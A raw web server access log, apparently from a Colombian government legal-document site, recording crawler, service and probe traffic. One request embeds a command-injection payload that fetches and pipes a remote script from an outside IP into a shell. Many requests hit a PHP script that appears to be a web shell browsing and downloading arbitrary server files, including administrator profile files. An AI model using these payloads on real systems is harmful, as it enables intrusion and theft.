201.245.192.253 - - [20/Jun/2024:03:56:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [20/Jun/2024:03:56:42 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
47.128.34.77 - - [20/Jun/2024:03:56:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1869.tif&ft=notepad&white=1 HTTP/1.1" 200 421577
201.245.192.253 - - [20/Jun/2024:03:57:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.124 - - [20/Jun/2024:03:57:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+101-150%5C&f=00000111.tif&white=1 HTTP/1.1" 200 172966
201.245.192.253 - - [20/Jun/2024:03:57:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.35.101 - - [20/Jun/2024:03:58:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1842.pdf&ft=img&white=1 HTTP/1.1" 200 405263
201.245.192.253 - - [20/Jun/2024:03:58:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.245.221.92 - - [20/Jun/2024:03:58:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:03:58:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:03:58:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:03:57:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.97.180 - - [20/Jun/2024:03:58:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400%5C&f=00000375.tif&ft=img&white=1 HTTP/1.1" 200 261892
201.245.192.253 - - [20/Jun/2024:03:59:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:03:57:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
49.51.206.130 - - [20/Jun/2024:03:59:43 -0500] "GET / HTTP/1.1" 200 319
47.128.121.159 - - [20/Jun/2024:03:59:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00377.pdf&ft=img&white=1 HTTP/1.1" 200 364303
201.245.192.253 - - [20/Jun/2024:03:59:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:00:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:00:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.41.191 - - [20/Jun/2024:04:00:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00377.pdf&ft=notepad&white=1 HTTP/1.1" 200 364232
47.128.98.110 - - [20/Jun/2024:04:01:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+888+DE+2006.PDF&ft=notepad&white=1 HTTP/1.1" 200 35083
201.245.192.253 - - [20/Jun/2024:04:01:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:01:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.98.117 - - [20/Jun/2024:04:01:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+101-150%5C&f=00000110.tif&white=1 HTTP/1.1" 200 20228
201.245.192.253 - - [20/Jun/2024:04:02:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:02:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.75 - - [20/Jun/2024:04:02:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CPMA-RAMSAR%5C&f=Resoluci%F3n+de+adopci%F3n_Resoluci%F3n+SDA-CAR+No.+37+de+2023.pdf&ft=img&white=1 HTTP/1.1" 200 98063
201.245.192.253 - - [20/Jun/2024:04:03:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.245.221.92 - - [20/Jun/2024:04:03:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.41.1 - - [20/Jun/2024:04:03:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+284+DE+2006.PDF&ft=notepad&white=1 HTTP/1.1" 200 4415159
201.245.192.253 - - [20/Jun/2024:04:03:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:03:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:04:04:05 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
47.128.116.163 - - [20/Jun/2024:04:04:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1697.pdf&ft=notepad&white=1 HTTP/1.1" 200 446153
201.245.192.253 - - [20/Jun/2024:04:04:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:04:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:04:03:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [20/Jun/2024:04:02:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.10 - - [20/Jun/2024:04:04:53 -0500] "GET /Publicaciones/2024EE107868.pdf HTTP/1.1" 404 228
172.22.2.4 - - [20/Jun/2024:04:03:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
47.128.32.14 - - [20/Jun/2024:04:04:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2650+DE+2006.PDF&ft=notepad&white=1 HTTP/1.1" 200 65118
34.22.213.78 - - [20/Jun/2024:04:05:10 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [20/Jun/2024:04:03:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
201.245.192.253 - - [20/Jun/2024:04:05:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.28 - - [20/Jun/2024:04:05:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_MarchaPaz.flv&ft=notepad&white=1 HTTP/1.1" 200 2277047
201.245.192.253 - - [20/Jun/2024:04:05:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [20/Jun/2024:04:06:10 -0500] "GET /BLA/resoluciones/AUTOS%202014/5786.pdf HTTP/1.1" 200 201202
47.128.45.225 - - [20/Jun/2024:04:06:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1249.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:04:06:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:06:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.31 - - [20/Jun/2024:04:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=admin-bar.php&ft=download&white=1 HTTP/1.1" 200 26177
201.245.192.253 - - [20/Jun/2024:04:07:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:07:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.55.139 - - [20/Jun/2024:04:07:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages&f=date-button.gif&ft=download HTTP/1.1" 200 400
201.245.192.253 - - [20/Jun/2024:04:08:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
185.191.127.212 - - [20/Jun/2024:04:08:20 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.245.221.92 - - [20/Jun/2024:04:08:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:08:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:08:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.34.108 - - [20/Jun/2024:04:08:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1703.pdf&ft=notepad&white=1 HTTP/1.1" 200 405193
47.128.41.139 - - [20/Jun/2024:04:09:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5515.pdf&ft=img&white=1 HTTP/1.1" 200 376591
201.245.192.253 - - [20/Jun/2024:04:09:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:09:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.41.131 - - [20/Jun/2024:04:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6739.pdf&ft=notepad&white=1 HTTP/1.1" 200 421577
172.22.2.4 - - [20/Jun/2024:04:08:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:10:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:10:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.81 - - [20/Jun/2024:04:10:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002968.tif&white=1 HTTP/1.1" 200 124568
172.22.2.4 - - [20/Jun/2024:04:09:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:04:11:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.116.94 - - [20/Jun/2024:04:11:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+246+DE+2006.PDF&ft=notepad&white=1 HTTP/1.1" 200 863927
201.245.192.253 - - [20/Jun/2024:04:11:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.55.16 - - [20/Jun/2024:04:12:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5C&f=NTUSER.DAT%7B016888bd-6c6f-11de-8d1d-001e0bcde3ec%7D.TM.blf&ft=code&white=1 HTTP/1.1" 200 1020
201.245.192.253 - - [20/Jun/2024:04:12:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:12:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.136 - - [20/Jun/2024:04:13:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5328.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:04:13:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.245.221.92 - - [20/Jun/2024:04:13:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:13:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:13:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.35.241 - - [20/Jun/2024:04:13:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0622.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
23.26.220.31 - - [20/Jun/2024:04:14:25 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Jun/2024:04:14:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:14:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.105 - - [20/Jun/2024:04:14:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002986.tif&white=1 HTTP/1.1" 200 36514
47.128.55.146 - - [20/Jun/2024:04:15:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2580+DE+2006.PDF&ft=notepad&white=1 HTTP/1.1" 200 17762
201.245.192.253 - - [20/Jun/2024:04:15:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:15:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.121.202 - - [20/Jun/2024:04:16:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1817.pdf&ft=notepad&white=1 HTTP/1.1" 200 211832
172.22.2.4 - - [20/Jun/2024:04:14:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:16:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:16:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.42.88 - - [20/Jun/2024:04:16:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050%5C&f=00001026.tif&white=1 HTTP/1.1" 200 75126
172.22.2.4 - - [20/Jun/2024:04:15:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [20/Jun/2024:04:17:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.176 - - [20/Jun/2024:04:17:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0305.pdf&ft=img&white=1 HTTP/1.1" 200 868111
201.245.192.253 - - [20/Jun/2024:04:17:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:17:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33086
201.245.192.253 - - [20/Jun/2024:04:18:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
201.245.192.253 - - [20/Jun/2024:04:18:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.125.9 - - [20/Jun/2024:04:18:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0474.pdf&ft=img&white=1 HTTP/1.1" 200 405263
216.245.221.92 - - [20/Jun/2024:04:18:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:18:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:18:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.43.159 - - [20/Jun/2024:04:19:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_indexes.lib.php&ft=notepad&white=1 HTTP/1.1" 200 12166
201.245.192.253 - - [20/Jun/2024:04:19:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:04:19:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:20:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:20:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.52 - - [20/Jun/2024:04:20:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002967.tif&white=1 HTTP/1.1" 200 201500
157.55.39.57 - - [20/Jun/2024:04:20:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0304.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:04:20:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34822
201.245.192.253 - - [20/Jun/2024:04:19:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
47.128.63.142 - - [20/Jun/2024:04:21:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000234.tif&ft=notepad&white=1 HTTP/1.1" 200 122144
201.245.192.253 - - [20/Jun/2024:04:21:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:04:21:36 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Jun/2024:04:21:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.135 - - [20/Jun/2024:04:22:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/Image8 HTTP/1.0" 404 1018
172.22.2.4 - - [20/Jun/2024:04:20:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:22:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:22:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.234 - - [20/Jun/2024:04:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4442.pdf&ft=img&white=1 HTTP/1.1" 200 376591
172.22.2.4 - - [20/Jun/2024:04:21:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [20/Jun/2024:04:23:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.245.221.92 - - [20/Jun/2024:04:23:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:04:23:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.29 - - [20/Jun/2024:04:23:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1807.pdf&ft=notepad&white=1 HTTP/1.1" 200 82494
201.245.192.253 - - [20/Jun/2024:04:23:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.58.149 - - [20/Jun/2024:04:24:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050%5C&f=00001037.tif&white=1 HTTP/1.1" 200 110022
201.245.192.253 - - [20/Jun/2024:04:24:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:24:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.16 - - [20/Jun/2024:04:25:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000240.tif&ft=notepad&white=1 HTTP/1.1" 200 157780
201.245.192.253 - - [20/Jun/2024:04:25:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.159 - - [20/Jun/2024:04:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=INDEX.DAT&ft=notepad&white=1 HTTP/1.1" 200 2000
66.249.66.21 - - [20/Jun/2024:04:25:47 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:04:25:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:04:25:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [20/Jun/2024:04:26:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:04:26:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.16 - - [20/Jun/2024:04:26:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400%5C&f=00000356.tif&ft=notepad&white=1 HTTP/1.1" 200 356037
